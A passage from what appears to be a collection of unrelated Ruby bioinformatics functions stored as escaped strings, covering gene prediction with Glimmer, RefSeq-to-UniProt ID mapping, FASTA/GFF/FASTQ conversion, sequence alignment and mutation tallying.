run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def write_gff_files(gene,fo,f1,f2)\r\n bioseq_seq, chr_id, chr_cord = obtain_data_from_ebi(gene) \r\n target_hash = obtain_target_from_seq(bioseq_seq)\r\n create_features_ensembl_seq_obj(bioseq_seq,target_hash)\r\n chr_target_hash=change_cord(target_hash,chr_cord)\r\n if target_hash.empty?\r\n f1.puts \"#{gene} \\n\"\r\n else\r\n #for chr gff file, #this is for the parent gene chr_id,. --> source, \"gene\", the coordinates in the chr, . --> score, strand, . --> phase, gene_id\r\n f2.puts \"#{chr_id}\\t.\\tgene\\t#{chr_cord[0]}\\t#{chr_cord[1]}\\t.\\t+\\t.\\tID=#{gene}\"\r\n end\r\n #this is for the chromosomas, chr_id, . --> source, featuretype, cordinates of the target, . --> score, strand, . --> phase, exon id and the Parent identifiers, ID=exon00001;Parent=mrna0001\r\n chr_target_hash.each do |key,value|\r\n f2.puts \"#{chr_id}\\t.\\tinterior coding exon\\t#{key[0]}\\t#{key[1]}\\t.\\t#{value[1]}\\t.\\t#{value[0]};Parent=#{gene}\"\r\n end\r\n # each loop for write in the gff file\r\n bioseq_seq.features.each do |feature|\r\n featuretype = feature.feature\r\n next unless featuretype == \"target_CTTCTT\"\r\n position = feature.position\r\n qual = feature.assoc \r\n positionss= position.split(\"..\")\r\n fo.puts\"#{gene}\\t.\\t#{featuretype}\\t#{positionss[0]}\\t#{positionss[1]}\\t.\\t#{qual[\"strand\"]}\\t.\\t#{qual[\"interior coding exon\"]}\"\r\n end\r\nend",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def before_perform\n @outdir = job.job_dir.to_s\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".in\" \n # still has to be generated\n @outfile = @basename+\".frags\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n @predict_ta = params['ta']\n reformat(@informat, \"fas\", @infile)\n @commands = []\n \n \n end",
"def before_results(controller_params)\n @num_seqs = 0\n\n resfile = File.join(job_dir, jobid+\".aln\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n\n # get the header\n @header = res.shift\n\n #get the alignment blocks\n @aln_blocks = []\n block = []\n num = 0\n res.each do |line|\n if (line =~ /^\\s*$/)\n if (!block.empty?)\n @aln_blocks.push(block)\n block = []\n if (@num_seqs == 0) then @num_seqs = num end\n num = 0\n end\n next\n end\n\n if (line !~ /^\\s+/) then num += 1 end\n block.push(line)\n end\n\n if (!block.empty?)\n @aln_blocks.push(block)\n end\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def before_perform\n \n @basename = File.join(job.job_dir, job.jobid)\n @seqfile = @basename+\".in\"\n params_to_file(@seqfile, 'sequence_input', 'sequence_file')\n @commands = []\n @informat = params['informat'] ? params['informat'] : 'fas'\n reformat(@informat, \"fas\", @seqfile)\n @informat = \"fas\"\n\n @maxpsiblastit = params['maxpsiblastit']\n @maxhhblitsit = params['maxhhblitsit']\n @ss_scoring = \"-ssm \" + params[\"ss_scoring\"]\n @ptot = \"-T \" + params[\"ptot\"]\n @pself = \"-P \" + params[\"pself\"]\n @mergerounds = \"-mrgr \" + params[\"mergerounds\"]\n @mact = \"-mapt1 \" + params[\"mact\"] + \" -mapt2 \" + params[\"mact\"] + \" -mapt3 \" + params[\"mact\"]\n @domm = params[\"domm\"].nil? ? \"-domm 0\" : \"\" \n \n @maxlines = \"20\"\n @v = 1\n \n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def annotate_samples\n # hash to connect metadata\n exp_hash = create_metadata_hash(@exp_metadata, 0) # { expid => [metadata] }\n bs_hash = create_metadata_hash(@bs_metadata, 0) # { biosampleid => [metadata] }\n srs_hash = create_metadata_hash(@bs_metadata, 1) # { sampleid => [metadata] }\n date_hash = received_date_by_experiment # { expid => date_received }\n\n annotated = Parallel.map(open(@samples_fpath).readlines.drop(1), :in_threads => @@nop) do |line|\n data = line.chomp.split(\"\\t\")\n sample_md = bs_hash[data[0]] || srs_hash[data[0]]\n sample_info = if sample_md\n coverage = if sample_md[3] != \"NA\"\n data[7].to_f / sample_md[3].to_f * 1_000_000\n else\n \"NA\"\n end\n [\n sample_md,\n coverage,\n ]\n else\n \"NA\\tNA\\tNA\\tNA\" # secondary sample id, taxon id, taxonomic name, coverage\n end\n [\n data,\n sample_info,\n exp_hash[data[1]],\n date_hash[data[1]],\n ].flatten.join(\"\\t\")\n end\n open(output_fpath(\"quanto.annotated.tsv\"), 'w'){|f| f.puts([annotated_header.join(\"\\t\"), annotated]) }\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? 
'+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def coverage\n if Experiment.find(params[:id]).uses_bam_file #return a pileup from samtools...\n\n else #return a position keyed hash of Positions objects\n features = Feature.find_in_range(params[:reference_id], params[:start], params[:end], params[:id])\n sequence = Reference.find(params[:reference_id]).sequence.sequence[params[:start].to_i - 1, (params[:end].to_i - params[:start].to_i)]\n positions = SimpleDepth.new(params[:start], params[:end], sequence, features)\n #comp_hash = {'A' => 'T', 'T' => 'A', 'G' => 'C', 'C' => 'G', 'N' => 'N'}\n #positions = Hash.new {|h,k| h[k] = {\n # '+' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # '-' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # 'position_total' => 0\n # }\n #}\n #positions['region_total'] = 0\n #positions['1'] = 1\n #features = Feature.find_in_range_no_overlap(params[:reference_id],params[:start],params[:end],params[:id])\n #features.each do |f|\n # if (f.sequence.match(/\\w/))\n # (f.start .. f.end - 1).each_with_index do |i, idx|\n # positions[i][f.strand][f.sequence[idx,1]] += 1\n # positions[i][f.strand]['strand_total'] += 1\n # positions[i]['position_total'] += 1\n # positions['region_total'] += 1\n # end\n # end\n end\n respond(positions)\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def main\n \n cosmic = ARGV[0]\n\n genes = {}\n total = {}\n nonsense = {}\n missense = {}\n silent = {}\n frameshift = {}\n inframe = {}\n deletion = {}\n other = {}\n\n File.new(cosmic, \"r\").each do |line|\n cols = line.split(/\\t/)\n \n name, mut = cols[0], cols[15]\n if !genes.key?(name)\n genes[name] = cols[2]\n total[name] = 0\n nonsense[name] = 0\n missense[name] = 0\n silent[name] = 0\n frameshift[name] = 0\n inframe[name] = 0\n deletion[name] = 0\n other[name] = 0\n end\n\n if mut.match(\"Missense\")\n missense[name] += 1\n elsif mut.match(\"Nonsense\")\n nonsense[name] += 1\n elsif mut.match(\"silent\")\n silent[name] += 1\n elsif mut.match(\"Frameshift\") or mut.match(\"frameshift\")\n frameshift[name] += 1\n elsif mut.match(\"inframe\")\n inframe[name] += 1\n elsif mut.match(\"Whole gene deletion\")\n deletion[name] += 1\n else\n other[name] += 1\n end\n total[name] += 1\n\n end\n \n puts \"#gene\\tCDS_length\\ttotal\\tnonsense\\tmissense\\tsilent\\tframeshift\\tinframe\\tgene_deletion\\tother\"\n\n total.sort_by {|a , b| b}.reverse.each do |gene, t|\n puts \"#{gene}\\t#{genes[gene]}\\t#{t}\\t#{nonsense[gene]}\\t#{missense[gene]}\\t#{silent[gene]}\\t#{frameshift[gene]}\\t#{inframe[gene]}\\t#{deletion[gene]}\\t#{other[gene]}\"\n end\n\nend",
"def write\n\n # reverse alignments\n @first_result.reverse!\n @second_result.reverse!\n\n # Create middle section for matches/mismatches\n index = 0\n @first_result.length.times do\n if @first_result[index] == @second_result[index]\n @central_alignment << \"|\"\n else\n @central_alignment << \" \"\n end\n index += 1\n end\n\n offset = @start_first > @start_second ? @start_first.to_s.length : @start_second.to_s.length\n border = \"\"\n\n (offset+1).times do # lines up center with alignments\n border << \"=\"\n end\n\n # formats beginning and end of sequence output\n @first_result.insert(0, @start_first.to_s << \"=\")\n @first_result << \"=\" << @max_cell_row.to_s\n @second_result.insert(0, \"\" << @start_second.to_s << \"=\")\n @second_result << \"=\" << @max_cell_column.to_s\n @central_alignment.insert(0, border)\n @central_alignment << border\n\n # separate sequences and center into at most chunks of at most 60\n first_chunks = @first_result.scan(/.{1,60}/)\n central_chunks = @central_alignment.scan(/.{1,60}/)\n second_chunks = @second_result.scan(/.{1,60}/)\n\n length = first_chunks.length\n\n File.open(\"result.txt\", 'w') {|file| \n i = 0\n length.times do\n file.puts first_chunks[i]\n file.puts 